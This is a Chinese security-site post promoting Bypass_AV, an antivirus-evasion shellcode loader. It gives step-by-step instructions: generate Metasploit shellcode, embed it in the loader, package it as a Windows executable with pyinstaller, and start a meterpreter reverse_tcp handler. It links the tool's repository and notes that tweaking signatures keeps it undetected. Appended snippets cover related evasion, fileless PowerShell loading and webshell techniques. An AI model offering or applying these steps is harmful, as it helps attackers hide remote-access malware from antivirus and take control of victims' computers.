免杀工具 -- Bypass_AV​【文末抽奖】

VSole2022-08-16 22:02:56

一、工具简介

Bypass_AV msf免杀,ShellCode免杀加载器 ,免杀shellcode执行程序 ,360&火绒&Windows Defender。代码够简单,估计要不了多久就进特征库了,被杀了再去改几个特征码照样又可以免杀,保持更新。

二、使用方法

1、环境

2022年5月8日 测试可以免杀国内杀软 火绒&360及Windows Defender

Windows 10 64位 360&火绒&Windows Defender

Windows 7 64位 或以上操作系统应该都没问题(没有测试)

2、使用msfvenom生成ShellCode(ShellCode 需要是64位的)

3、加载器

将生成的ShellCode 填至 Bypass_AV.py 里的 ShellCode = '''ShellCode''' 处,注意:保留原始ShellCode 里的双引号 "

4、打包成可执行程序

Python 3.8.6

pyinstaller 4.7

pip install pyinstaller 

pyinstaller -F -w Bypss_AV.py

生成Bypass_AV.exe在dist目录中

5、运行监听

msfconsole
msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8080
msf6 exploit(multi/handler) > ru

三、检测效果

四、工具下载

项目地址:https://github.com/Axx8/Bypass_AV

免杀handler
本作品采用《CC 协议》,转载必须注明作者和本文链接
Bypass_AV msf,ShellCode加载器 ,shellcode执行程序 ,360&火绒&Windows Defender代码够简单,估计要不了多久就进特征库了,被了再去改几个特征码照样又可以,作者的github保持更新,可以去瞅瞅。测试可以国内软?注意:ShellCode 需要是64位的加载器将生成的ShellCode 填至 Bypass_AV.py 里的 ShellCode = '''ShellCode''' 处注意:保留原始ShellCode 里的双引号 "示例:最终格式:打包成可执行程序编译Python 3.8.6pyinstaller 4.7pip install pyinstaller
Bypass_AV msf,ShellCode加载器 ,shellcode执行程序 ,360&火绒&Windows Defender。代码够简单,估计要不了多久就进特征库了,被了再去改几个特征码照样又可以,保持更新。
,又叫杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。的基本特征是破坏特征,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次就能完成了。
知识汇总
2021-08-25 23:11:00
知识汇总
今天脑子里面蹦出来个想法,杀木马然后cs上线,本来想让cs与msf联动的,但是出了点小问题,还是先研究火绒吧。
顾名思义,无需将恶意文件传到目标服务器/机器上,直接利用powershell的特性加载到内存执行。为了在红队行动中更隐蔽的实施攻击以及横向移动,同时还可以解决目标不出网只能通过dns上线时的棘手问题,利用powershell可以避免一行行echo。
生成PayloadMetasploit,输出c、py格式,可用xor、xor_dynamic、zutto_dekiru编码器。CobaltStrike,这里选择使用x64的C语言或Python语言的Shellcode。
下载dll,并添加至ext中在php.ini 中添加该扩展修改configure.ini;?具体步骤通过phpinfo获取扩展信息,根据不同的加密扩展进行尝试利用默认密钥进行加密,通过访问webshell来判断密钥是否正确,当然,这种方法其实只能用于权限维持需要拿到权限后获取扩展文件破解后,才能稳定获取密钥,进而加密webshell
VSole
网络安全专家